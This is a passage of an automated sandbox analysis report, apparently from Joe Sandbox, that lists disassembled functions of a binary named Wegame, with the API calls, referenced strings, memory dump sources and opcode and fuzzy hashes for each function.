                                                                • Opcode Fuzzy Hash: 4ac6bbc186760c077c95b5b5302abb81f627a114b73e2a8fa4909bfc9a05ead2
                                                                • Instruction Fuzzy Hash: 77016D70E00248DBCB10EBB5C4557DDBAF4AF44318F60855EE045B72C1EBBCA605CB9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD83F74 Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD83F7B
                                                                • ?get_qm_report_guid@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,0000001C), ref: 6BD83F84
                                                                  • Part of subcall function 6BD83DDA: __EH_prolog3_GS.LIBCMT ref: 6BD83DE4
                                                                  • Part of subcall function 6BD83DDA: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD83E2E
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(0000001C), ref: 6BD83F8E
                                                                • ?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,0000001C), ref: 6BD83F99
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@$?get_log_instance@base@@?get_qm_report_guid@common@ierd_tgp@@?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?set_qm_report_guid@D@2@@std@@D@2@@std@@@Logger@1@Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@
                                                                • String ID:
                                                                • API String ID: 2250616750-0
                                                                • Opcode ID: 630b9b31cae0c8ba0ae8c22d7662ca354cdb3127e2e7843dde4a49bea1af1557
                                                                • Instruction ID: 719afdbd8e936daa49ac4d3baa09ac83de5c2655aa7456017d2a428a21f9416b
                                                                • Opcode Fuzzy Hash: 630b9b31cae0c8ba0ae8c22d7662ca354cdb3127e2e7843dde4a49bea1af1557
                                                                • Instruction Fuzzy Hash: 98E08C31910208D7CF08E7F0D502ADC77316F24379FA00218D105AB0E0EF3C97009630
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD38E87 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD38E91
                                                                  • Part of subcall function 6BD36508: __EH_prolog3.LIBCMT ref: 6BD3650F
                                                                  • Part of subcall function 6BD36508: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP140(00000008,6BD38EBD,00000003,00000001,00000100,6BD36B1D,?,?,00000000), ref: 6BD36533
                                                                  • Part of subcall function 6BD36508: ??0?$basic_iostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@@Z.MSVCP140(?,00000000,00000008,6BD38EBD,00000003,00000001,00000100,6BD36B1D,?,?,00000000), ref: 6BD3654C
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,6BFA11FC,00000003,00000001,00000100,6BD36B1D,?,?,00000000), ref: 6BD38F9F
                                                                  • Part of subcall function 6BD325EA: __EH_prolog3_catch.LIBCMT ref: 6BD325F1
                                                                  • Part of subcall function 6BD325EA: ?width@ios_base@std@@QBE_JXZ.MSVCP140(00000024), ref: 6BD3261F
                                                                  • Part of subcall function 6BD325EA: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 6BD32636
                                                                  • Part of subcall function 6BD325EA: ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 6BD3264E
                                                                  • Part of subcall function 6BD325EA: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BD327AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?width@ios_base@std@@U?$char_traits@_$D@std@@@std@@U?$char_traits@W@std@@@std@@$??0?$basic_ios@_??0?$basic_iostream@_??1?$basic_ios@?setstate@?$basic_ios@H_prolog3H_prolog3_catchH_prolog3_catch_V?$basic_streambuf@_W@std@@@1@@
                                                                • String ID: .log
                                                                • API String ID: 2979257234-299349702
                                                                • Opcode ID: cceed8db8d9de086860ce9fdf314d67091c829090d1474f24e3a6f069f3d57a8
                                                                • Instruction ID: 65639bf4128f704945ffc01c3616c9e4641ab614f89e801591815073dff9a6a5
                                                                • Opcode Fuzzy Hash: cceed8db8d9de086860ce9fdf314d67091c829090d1474f24e3a6f069f3d57a8
                                                                • Instruction Fuzzy Hash: 94318F72C04268EEDF15DFA4D946BDDB7B8AF06228F10409AE404AB151DB79AF45CB70
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BF6FD50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 6BF70126
                                                                • socket.WS2_32(00000002,00000002,00000000), ref: 6BF70136
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID: type
                                                                • API String ID: 98920635-2363381545
                                                                • Opcode ID: 996bb01e806b126a7c7c464b97fd6a18390c407f38a41eede09d3c265ab02a7a
                                                                • Instruction ID: 2dfd2361d9cb908dbbe9fba51f4d80598d0653075ce054babe47ddad0df9b7e4
                                                                • Opcode Fuzzy Hash: 996bb01e806b126a7c7c464b97fd6a18390c407f38a41eede09d3c265ab02a7a
                                                                • Instruction Fuzzy Hash: 1911CE776182805ADB401E34AC56B857BB2AF077C4F4400D0EC85CB2B2F39BEC08C211
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD60B62 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CopyFileW.KERNEL32(00000000,6BD49F7C,00000000,00000000,?,?,6BD60BD9,00000000,6BD49F7C,00000000,00000000,?,?,?,6BD49F7C), ref: 6BD60B8C
                                                                • GetLastError.KERNEL32(?,6BD60BD9,00000000,6BD49F7C,00000000,00000000,?,?,?,6BD49F7C), ref: 6BD60B96
                                                                Strings
                                                                • ierd_tgp::filesystem::copy_file, xrefs: 6BD60BA0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CopyErrorFileLast
                                                                • String ID: ierd_tgp::filesystem::copy_file
                                                                • API String ID: 374144340-1011023781
                                                                • Opcode ID: b8b45fe199e001b209ed20a03f4ab63037dfe5dd492b153893d99cf376d8b2b1
                                                                • Instruction ID: 310b352145337cb25e7cbd44c4a5a288adc8bc8d17bd4fb94cc689028e137840
                                                                • Opcode Fuzzy Hash: b8b45fe199e001b209ed20a03f4ab63037dfe5dd492b153893d99cf376d8b2b1
                                                                • Instruction Fuzzy Hash: 39F0B475611200AB8B005F28DC4886B7B7EFB866F6B144429F80487110E734EA55C7F1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD31B55 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD31B5C
                                                                  • Part of subcall function 6BD3084F: __EH_prolog3.LIBCMT ref: 6BD30856
                                                                Strings
                                                                • boost unique_lock owns already the mutex, xrefs: 6BD31B6F
                                                                • boost unique_lock has no mutex, xrefs: 6BD31B96
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3H_prolog3_
                                                                • String ID: boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                • API String ID: 3355343447-3352860666
                                                                • Opcode ID: 3f933d1adf49c57b51f0ecc2c3ce49b52c97ce80c060f0913c8dbd52a11cb730
                                                                • Instruction ID: deb252848037ab5900fbecda824cd65eb4a7c56af697e7637adcbee17f5fcc78
                                                                • Opcode Fuzzy Hash: 3f933d1adf49c57b51f0ecc2c3ce49b52c97ce80c060f0913c8dbd52a11cb730
                                                                • Instruction Fuzzy Hash: 06F0EC30C01271DAD72CE774C416BAD77905F13B19F10845D51542F0D2DBBC5744D261
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1001D6E1 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,1001D4A9,?,?,00000000,00000001,?,1000CE1A,?), ref: 1001D709
                                                                • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,1001D4A9,?,?,00000000,00000001,?,1000CE1A,?), ref: 1001D73D
                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 1001D757
                                                                • HeapFree.KERNEL32(00000000,?), ref: 1001D76E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338444411.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000003.00000002.3338431891.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338466811.0000000010028000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338481780.000000001002C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338495282.000000001002D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338508628.0000000010032000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_10000000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AllocHeap$FreeVirtual
                                                                • String ID:
                                                                • API String ID: 3499195154-0
                                                                • Opcode ID: 0ba27c6808261be2fa74b2d3532c30834d8d7c6565af0c5bbfb89e97ab183ee3
                                                                • Instruction ID: 381d547259dd0304dc07480b0656bd963f505275cad3580deb467ca1c8d228bd
                                                                • Opcode Fuzzy Hash: 0ba27c6808261be2fa74b2d3532c30834d8d7c6565af0c5bbfb89e97ab183ee3
                                                                • Instruction Fuzzy Hash: D9113D712002619FE3A0EF19CDC9E257BB5FB467A47204A3EF552C61F0D3709846CB00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE388C0 Relevance: 4.7, APIs: 3, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 66f83a09a8379eaf752454a3629e0b2f509811f2a76718905f26c1995eb3e276
                                                                • Instruction ID: b9dc32ad1c1d0a1dfd4c715c00cffa59326918714d8bbabd7fa00ba77060872a
                                                                • Opcode Fuzzy Hash: 66f83a09a8379eaf752454a3629e0b2f509811f2a76718905f26c1995eb3e276
                                                                • Instruction Fuzzy Hash: 2E81F8B1505F418AE3219F34D9097C7BBE0BF42319F148A1DD4FE5A292DBBA2188CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040BF70 Relevance: 4.6, APIs: 3, Instructions: 123COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00402114,?), ref: 0040BF9A
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,?,00402114,?), ref: 0040C051
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040C0A1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 2580228974-0
                                                                • Opcode ID: a193b5e951c04ba6fe596a5f97ae441eeabaef0c773f1add34fceb50e13f03ab
                                                                • Instruction ID: cbed7e267662b95892dc5dae9ab6d257054e7b35893b0ec697b1107df151af65
                                                                • Opcode Fuzzy Hash: a193b5e951c04ba6fe596a5f97ae441eeabaef0c773f1add34fceb50e13f03ab
                                                                • Instruction Fuzzy Hash: DA310372A00205DBC7249B79DCC096AB799EF85360720073BF926D72D1EB389944C7DA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDD2ECA Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDD2ED4
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000000,6BDD41FB,00000218,6BDD36E3,?,?), ref: 6BDD2F17
                                                                • _Open_dir.MSVCP140(?,?,?,?,?,00000000,6BDD41FB,00000218,6BDD36E3,?,?), ref: 6BDD2F50
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ??0path@filesystem@ierd_tgp@@H_prolog3_Open_dirU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@malloc
                                                                • String ID:
                                                                • API String ID: 2906514752-0
                                                                • Opcode ID: e4f1537c6fd0200a6d8a8485dd93596a8409162d317acb093d3fef4765ea85a1
                                                                • Instruction ID: 89cb6aa9f45f1bca69bf90cc2c5c6e5fcff9b5c02f4424016a580231d13f61ba
                                                                • Opcode Fuzzy Hash: e4f1537c6fd0200a6d8a8485dd93596a8409162d317acb093d3fef4765ea85a1
                                                                • Instruction Fuzzy Hash: 6821A2B1900219DBCB21DFA8C885ADDBBF5EF58314F1005DDE1889B250CB389B45DF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD3A075 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD3A07C
                                                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,0000001C,6BD36841), ref: 6BD3A097
                                                                  • Part of subcall function 6BD38127: __EH_prolog3_GS.LIBCMT ref: 6BD38131
                                                                  • Part of subcall function 6BD38127: memset.VCRUNTIME140(?,00000000,00000040,000000A0,6BD3A0D1,?,?,?), ref: 6BD38192
                                                                • _memcpy_s.PGOCR ref: 6BD3A0FB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$_memcpy_s_time64memset
                                                                • String ID:
                                                                • API String ID: 2258469228-0
                                                                • Opcode ID: 21bf1dc57acb677fb45b238b24576a6162f08f7608d63269d496a3165486e90b
                                                                • Instruction ID: 47484d188e5c045af4b55af46890c0c6be1a4658cbb5a245f641d0fb0f87398f
                                                                • Opcode Fuzzy Hash: 21bf1dc57acb677fb45b238b24576a6162f08f7608d63269d496a3165486e90b
                                                                • Instruction Fuzzy Hash: 9C219D71800749CFCB20DFA4C5415DEFFB4AF1A220F54056EC196A7592E735A644DB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE4C310 Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,6BE80A93,C4830E8B,C4830E8B,crypto\lhash\lhash.c,0000010C,?), ref: 6BE4C35F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: malloc
                                                                • String ID:
                                                                • API String ID: 2803490479-0
                                                                • Opcode ID: b4af3e363ea64636575310b0a5b12e1e103a8ed3b870786d7be04e710313dc63
                                                                • Instruction ID: 211180083291a32fa859badc680cc16cffe913c5fafbed625beacf59d1272236
                                                                • Opcode Fuzzy Hash: b4af3e363ea64636575310b0a5b12e1e103a8ed3b870786d7be04e710313dc63
                                                                • Instruction Fuzzy Hash: 3B01EDB170930297EF44DE65AC45B2E36E5AB85646F6448ACB458C3360EB2DD4289613
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD84034 Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD8403E
                                                                • memset.VCRUNTIME140(?,00000000,00000094,0000009C,6BD86019,?,?,?,?,?,00000000,00000006,00000358,6BD85EF7,6C09F000), ref: 6BD84061
                                                                • GetVersionExA.KERNEL32(00000094), ref: 6BD8407A
                                                                  • Part of subcall function 6BD84503: __EH_prolog3_GS.LIBCMT ref: 6BD8450D
                                                                  • Part of subcall function 6BD84503: memset.VCRUNTIME140(?,00000000,00000100,000003B0,6BD84096,?,00000010,?), ref: 6BD84553
                                                                  • Part of subcall function 6BD84503: __snprintf_s.LIBCMT ref: 6BD8456C
                                                                  • Part of subcall function 6BD84503: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 6BD84589
                                                                  • Part of subcall function 6BD84503: memset.VCRUNTIME140(?,00000000,00000018), ref: 6BD845AC
                                                                  • Part of subcall function 6BD84503: DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 6BD845CD
                                                                  • Part of subcall function 6BD84503: memset.VCRUNTIME140(?,00000000,00000021), ref: 6BD84601
